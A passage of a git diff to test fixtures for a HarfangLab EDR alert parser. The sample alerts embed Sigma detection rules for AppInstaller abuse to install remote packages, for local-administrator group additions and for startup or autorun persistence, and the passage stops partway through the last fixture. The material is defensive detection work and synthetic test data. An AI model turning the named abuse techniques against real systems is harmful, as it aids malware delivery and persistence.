"PL-3049" ], "user": [
- "EXAMPLE\\jdoe"
+ "jdoe"
] }, "rule": {
@@ -87,7 +88,8 @@
"name": "File Added/Modified in Startup Directory" }, "user": {
- "name": "EXAMPLE\\jdoe"
+ "domain": "EXAMPLE",
+ "name": "jdoe"
} } }
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/alert_2.json b/HarfangLab/harfanglab/tests/alert_2.json
index 310b001a9..ffb3dd936 100644
--- a/HarfangLab/harfanglab/tests/alert_2.json
+++ b/HarfangLab/harfanglab/tests/alert_2.json
@@ -35,7 +35,8 @@
"{\"id\": \"00000000-0000-0000-0000-000000000000\", \"name\": \"EXAMPLE\"}" ], "level": "medium",
- "status": "new"
+ "status": "new",
+ "threat_key": "2912"
}, "host": { "domain": "EXAMPLE",
@@ -83,7 +84,7 @@
"PL3024" ], "user": [
- "EXAMPLE\\jdoe"
+ "jdoe"
] }, "rule": {
@@ -93,7 +94,8 @@
"name": "Registry Autorun Key Added" }, "user": {
- "name": "EXAMPLE\\jdoe",
+ "domain": "EXAMPLE",
+ "name": "jdoe",
"roles": "EXAMPLE" } }
diff --git a/HarfangLab/harfanglab/tests/alert_3.json b/HarfangLab/harfanglab/tests/alert_3.json
index db3a57056..4ea4e0884 100644
--- a/HarfangLab/harfanglab/tests/alert_3.json
+++ b/HarfangLab/harfanglab/tests/alert_3.json
@@ -42,7 +42,8 @@
"script_path": "C:\\Scripts\\SomeWhere\\Get-FaInterco\\Get-FaNetworkFlowV2.ps1" } },
- "status": "new"
+ "status": "new",
+ "threat_key": "16364"
}, "host": { "domain": "Example",
@@ -84,7 +85,7 @@
"SRV001" ], "user": [
- "EXAMPLE\\j.doe"
+ "j.doe"
] }, "rule": {
@@ -94,7 +95,8 @@
"name": "PowerShellInvoke-CommandExecutedonRemoteHost" }, "user": {
- "name": "EXAMPLE\\j.doe",
+ "domain": "EXAMPLE",
+ "name": "j.doe",
"roles": "Servers" } }
diff --git a/HarfangLab/harfanglab/tests/alert_4.json b/HarfangLab/harfanglab/tests/alert_4.json
new file mode 100644
index 000000000..c0c748a53
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/alert_4.json
@@ -0,0 +1,114 @@ +{ + "input": { + "message": "{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program 
Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "sekoiaio": { + "intake": { + "dialect": "HarfangLab EDR", + "dialect_uuid": "3c7057d3-4689-4fae-8033-6f1f887a70f2" + } + } + }, + "expected": { + "message": 
"{\"log_type\":\"alert\",\"maturity\":\"stable\",\"alert_unique_id\":\"11111111-2222-3333-4444-555555555555\",\"alert_time\":\"2024-11-18T09:18:31.852+00:00\",\"@timestamp\":\"2024-11-18T09:18:31.852+00:00\",\"ingestion_date\":\"2024-11-18T09:18:31.852+00:00\",\"@event_create_date\":\"2024-11-18T09:18:31.558Z\",\"detection_date\":\"2024-11-18T09:18:31.558+00:00\",\"rule_name\":\"Package Installed via AppInstaller from the Internet\",\"rule_id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"msg\":\"Detects URL requests performed by AppInstaller in order to install a remote application.\\nAdversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\n\",\"type\":\"rtlogs\",\"alert_subtype\":\"process\",\"alert_type\":\"sigma\",\"status\":\"new\",\"level\":\"medium\",\"level_int\":30,\"execution\":0,\"quarantine\":4,\"details_url_request\":{\"url\":\"https://url.integration.com/test\",\"verb\":\"POST\",\"host\":\"url.integration.com\",\"event_time\":\"2024-11-18T09:18:30.550347Z\"},\"tags\":[\"attack.initial_access\",\"attack.t1189.001\"],\"mitre_cells\":[],\"agent\":{\"agentid\":\"11111111-aaaa-bbbb-cccc-222222222222\",\"hostname\":\"HOST01\",\"domain\":null,\"domainname\":\"DOMAINSI\",\"dnsdomainname\":\"intra.domain.fr\",\"ostype\":\"windows\",\"osversion\":\"10.0.19045\",\"distroid\":null,\"osproducttype\":\"Windows 10 Pro\",\"version\":\"4.2.10\",\"additional_info\":{}},\"process\":{\"commandline\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe 
-ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\",\"create_time\":\"2024-11-18T09:18:29.211Z\",\"current_directory\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\\",\"hashes\":{\"md5\":\"b4e821b2dac20d8d2ac6889f9c3fc315\",\"sha1\":\"a53b060cfb5e23508b4f9658d904cd7cb659de7f\",\"sha256\":\"3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45\"},\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"log_type\":\"process\",\"parent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\svchost.exe -k DcomLaunch -p\",\"parent_image\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"parent_unique_id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"pid\":20188,\"ppid\":1332,\"process_name\":\"AppInstaller.exe\",\"process_unique_id\":\"11111111-aaaa-2222-bbbb-333333333333\",\"size\":2860064,\"username\":\"DOMAINSI\\\\JDOE\",\"grandparent_image\":\"C:\\\\Windows\\\\System32\\\\services.exe\",\"grandparent_commandline\":\"C:\\\\WINDOWS\\\\system32\\\\services.exe\",\"grandparent_unique_id\":\"66666666-7777-8888-9999-000000000000\",\"stacktrace\":\"\",\"stacktrace_minimal\":\"\",\"ancestors\":\"C:\\\\Windows\\\\System32\\\\svchost.exe|C:\\\\Windows\\\\System32\\\\services.exe|C:\\\\Windows\\\\System32\\\\wininit.exe\",\"usersid\":\"S-1-2-3-4-5\",\"integrity_level\":\"Low\",\"session\":1,\"logonid\":1686269,\"parent_integrity_level\":\"System\",\"grandparent_integrity_level\":\"System\",\"fake_ppid\":0,\"fake_parent_image\":\"\",\"fake_parent_commandline\":\"\",\"pe_info\":{\"company_name\":\"Microsoft Corporation\",\"file_description\":\"AppInstaller.exe\",\"file_version\":\"1.24.25180.00000\",\"internal_name\":\"AppInstaller\",\"legal_copyright\":\"\u00a9Microsoft Corporation. 
All rights reserved.\",\"original_filename\":\"AppInstaller.exe\",\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"product_name\":\"Microsoft Desktop App Installer\",\"product_version\":\"1.24.25180.0\"},\"signed\":true,\"signature_info\":{\"signer_info\":{\"serial_number\":\"1234567890\",\"thumbprint\":\"8f985be8fd256085c90a95d3c74580511a1db975\",\"thumbprint_sha256\":\"e4ab39116a7dc57d073164eb1c840b1fb8334a8c920b92efafea19112dce643b\",\"issuer_name\":\"Microsoft Code Signing PCA 2011\",\"display_name\":\"Microsoft Corporation\"},\"root_info\":{\"serial_number\":\"abcdef12\",\"thumbprint\":\"8f43288ad272f3103b6fb1428485ea3014c0bcfe\",\"thumbprint_sha256\":\"847df6a78497943f27fc72eb93f9a637320a02b561d0a91b09e87a7807ed7c61\",\"issuer_name\":\"Microsoft Root Certificate Authority 2011\",\"display_name\":\"Microsoft Root Certificate Authority 2011\"},\"signed_authenticode\":true,\"signed_catalog\":false},\"pe_timestamp_int\":1729898048,\"pe_timestamp\":\"2024-10-25T23:14:08.000Z\",\"pe_imphash\":\"714FD4ADFC932C947A3949463867BE18\",\"dont_create_process\":true,\"status\":0,\"detection_timestamp\":\"2024-11-18T09:18:31.558Z\",\"system_event_type\":\"url_request_event\",\"ioc_matches\":[],\"log_platform_flag\":0,\"sigma_rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\"},\"detection_origin\":\"agent\",\"image_name\":\"C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\AppInstaller.exe\",\"rule_content\":\"title: \\\"Package Installed via AppInstaller from the Internet\\\"\\nid: aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\\ndescription: |\\n Detects URL requests performed by AppInstaller in order to install a remote application.\\n Adversaries have been seen abusing the AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\\n Microsoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\\n It is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\\nreferences:\\n - 
https://www.microsoft.com/en-us/security/blog/2023/12/28/financially-motivated-threat-actors-misusing-app-installer/\\n - https://learn.microsoft.com/en-us/windows/msix/app-installer/installing-windows10-apps-web\\n - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\\n - https://attack.mitre.org/techniques/T1189/\\nstatus: stable\\ndate: 2023/12/28\\nmodified: 2024/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.initial_access\\n - attack.t1189.001\\nlogsource:\\n product: windows\\n category: url_request\\ndetection:\\n selection:\\n ProcessOriginalFileName: AppInstaller.exe\\n ProcessCommandLine|contains: -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\\n\\n exclusion_knownurl:\\n RequestUrlHost:\\n - download.mytobiidynavox.com # Snap.Windows.WinUI.OEM_1.30.0.3621.msixbundle\\n - windbg.download.prss.microsoft.com # windbg.appinstaller\\n - languagetool.org # Languagetool.Packaging_0.5.3.5_x64.msixbundle\\n - staticcdn.duckduckgo.com # DuckDuckGo_0.61.5.0.msixbundle\\n condition: selection and not 1 of exclusion_*\\nlevel: medium\",\"aggregation_key\":\"1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c\",\"threat_type\":\"commandline\",\"threat_values\":[\":\\\\program files\\\\windowsapps\\\\microsoft.desktopappinstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\\\appinstaller.exe -servername:app.appx9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca\"],\"threat_key\":1343,\"groups\":[{\"id\":\"12345678-abcd-ef90-1234-123456abcdef\",\"name\":\"DOMAIN_Postes_de_travail_Windows\"}]}", + "event": { + "category": [ + "process" + ], + "dataset": "alert", + "kind": "alert", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-18T09:18:31.558000Z", + "agent": { + "id": "11111111-aaaa-bbbb-cccc-222222222222", + "name": "harfanglab" + }, + "file": { + "hash": { + "md5": "b4e821b2dac20d8d2ac6889f9c3fc315", + "sha1": "a53b060cfb5e23508b4f9658d904cd7cb659de7f", + "sha256": "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45" + } + }, + 
"harfanglab": {
+ "aggregation_key": "1609170aa71e23cf15ca43adc927697e071c4a4207f8d4fc9d74f7382b4e9b9c",
+ "alert_subtype": "process",
+ "alert_time": "2024-11-18T09:18:31.852+00:00",
+ "alert_unique_id": "11111111-2222-3333-4444-555555555555",
+ "execution": 0,
+ "groups": [
+ "{\"id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"name\": \"DOMAIN_Postes_de_travail_Windows\"}"
+ ],
+ "level": "medium",
+ "status": "new",
+ "threat_key": "1343"
+ },
+ "host": {
+ "domain": "DOMAINSI",
+ "hostname": "HOST01",
+ "name": "HOST01",
+ "os": {
+ "full": "Windows 10 Pro",
+ "version": "10.0.19045"
+ }
+ },
+ "log": {
+ "hostname": "HOST01"
+ },
+ "process": {
+ "command_line": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca",
+ "executable": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\AppInstaller.exe",
+ "name": "AppInstaller.exe",
+ "parent": {
+ "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p",
+ "executable": "C:\\Windows\\System32\\svchost.exe"
+ },
+ "pe": {
+ "company": "Microsoft Corporation",
+ "description": "AppInstaller.exe",
+ "file_version": "1.24.25180.00000",
+ "imphash": "714FD4ADFC932C947A3949463867BE18",
+ "original_file_name": "AppInstaller.exe",
+ "product": "Microsoft Desktop App Installer"
+ },
+ "pid": 20188,
+ "working_directory": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.24.25180.0_x64__8wekyb3d8bbwe\\"
+ },
+ "related": {
+ "hash": [
+ "3cc3cbf238e81e92242f4c5f422d85636d1771f2ebc781c2c8de5394f0741b45",
+ "a53b060cfb5e23508b4f9658d904cd7cb659de7f",
+ "b4e821b2dac20d8d2ac6889f9c3fc315"
+ ],
+ "hosts": [
+ "HOST01"
+ ],
+ "user": [
+ "JDOE"
+ ]
+ },
+ "rule": {
+ "category": "sigma",
+ "description": "Detects URL requests performed by AppInstaller in order to install a remote application.\nAdversaries have been seen abusing the 
AppInstaller URI scheme (ms-appinstaller) to trick users into installing malicious software directly from Internet.\nMicrosoft has disabled installation of remote package by default in late December 2023 but it can still be enabled via a group policy configuration.\nIt is recommended to check if the accessed URL correspond to a known and legitimate application and if suspicious commands have been launched during the installation process.\n",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "name": "Package Installed via AppInstaller from the Internet"
+ },
+ "url": {
+ "domain": "url.integration.com",
+ "original": "https://url.integration.com/test",
+ "path": "/test",
+ "port": 443,
+ "registered_domain": "integration.com",
+ "scheme": "https",
+ "subdomain": "url",
+ "top_level_domain": "com"
+ },
+ "user": {
+ "domain": "DOMAINSI",
+ "name": "JDOE",
+ "roles": "DOMAIN_Postes_de_travail_Windows"
+ }
+ }
+}
\ No newline at end of file
diff --git a/HarfangLab/harfanglab/tests/alert_5.json b/HarfangLab/harfanglab/tests/alert_5.json
new file mode 100644
index 000000000..3202a7f54
--- /dev/null
+++ b/HarfangLab/harfanglab/tests/alert_5.json
@@ -0,0 +1,90 @@ +{ + "input": { + "message": "{\"type\": \"rtlogs\", \"level\": \"medium\", \"maturity\": \"stable\", \"quarantine\": 4, \"rule_content\": \"title: User Account Added to the Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"alert_time\": \"2024-11-12T08:39:14.017+00:00\", \"rule_name\": \"User Account Added to the Local Administrators Group\", \"tags\": [\"attack.persistence\", \"attack.privilege_escalation\", \"attack.t1078.003\", \"attack.t1098\"], \"level_int\": 30, \"eventlog\": {\"level\": \"log_always\", \"type\": \"wineventlog\", \"detection_timestamp\": \"2024/11/12 08:39:13.967\", \"event_id\": 4732, \"event_data\": {\"SubjectUserSid\": \"S-1-2-4-5-6\", \"SubjectDomainName\": \"NT_DOMAIN\", \"PrivilegeList\": \"-\", \"TargetDomainName\": \"Builtin\", \"TargetUserName\": \"Administrateurs\", \"MemberSid\": \"S-1-2-4-7-8\", \"MemberName\": \"NT_DOMAIN\\\\DOEJ\", \"SubjectUserName\": \"sw-suser\", \"TargetSid\": \"S-1-2-3-4\", \"SubjectLogonId\": \"0x1234567\"}, \"record_number\": 174136362, \"event_date\": \"2024-11-12T08:39:13.205Z\", \"sigma_rule_content\": \"title: User Account Added to the 
Local Administrators Group\\nid: 12345678-abcd-ef90-1234-123456abcdef\\ndescription: \\\"Detects when a user account is added into the local Administrators group.\\\\n\\nThis action can be the result of a malicious activity.\\\"\\nreferences:\\n - https://attack.mitre.org/techniques/T1098/\\n - https://attack.mitre.org/techniques/T1078/003/\\nstatus: stable\\ndate: 2021/04/28\\nmodified: 2021/01/10\\nauthor: HarfangLab\\ntags:\\n - attack.persistence\\n - attack.t1098\\n - attack.privilege_escalation\\n - attack.t1078.003\\nlogsource:\\n product: windows\\n service: security\\ndetection:\\n selection:\\n EventID: 4732\\n GroupSid: S-1-2-3-4\\n exclusion:\\n - MemberSid: S-1-2-4-*-512 # avoid detection when a computer joined a domain (domain admins sid)\\n - SubjectUserName|endswith: \\n condition: selection and not exclusion\\nfalsepositives:\\n - Legitimate administrator action\\nlevel: medium\", \"source_name\": \"Microsoft-Windows-Security-Auditing\", \"dont_create_eventlog\": true, \"user\": {\"domain\": \"\", \"name\": \"\", \"type\": \"unknown\", \"identifier\": \"\"}, \"thread_id\": 1728, \"log_name\": \"Security\", \"process_id\": 1224, \"status\": 0, \"ioc_matches\": [], \"provider_guid\": \"54849625-5478-4994-a5ba-3e3b0328c30d\", \"keywords\": [\"AuditSuccess\", \"ReservedKeyword63\"], \"log_type\": \"eventlog\", \"computer_name\": \"PC01.domain.com\", \"user_data\": {}, \"system_event_type\": \"event_log_event\"}, \"threat_values\": [], \"destination\": \"syslog\", \"@timestamp\": \"2024-11-12T08:39:14.017Z\", \"detection_date\": \"2024-11-12T08:39:13.967+00:00\", \"@event_create_date\": \"2024-11-12T08:39:14.017Z\", \"aggregation_key\": \"8415b902c507b98714301b4ab6633009fbf2728c0cfaf61637c5e903627e4ebb\", \"alert_type\": \"sigma\", \"rule_id\": \"12345678-abcd-ef90-1234-123456abcdef\", \"ingestion_date\": \"2024-11-12T08:39:14.017+00:00\", \"tenant\": \"3b37ffc8520ef542\", \"threat_type\": \"new\", \"groups\": [{\"name\": \"Postes de travail\", \"id\": 
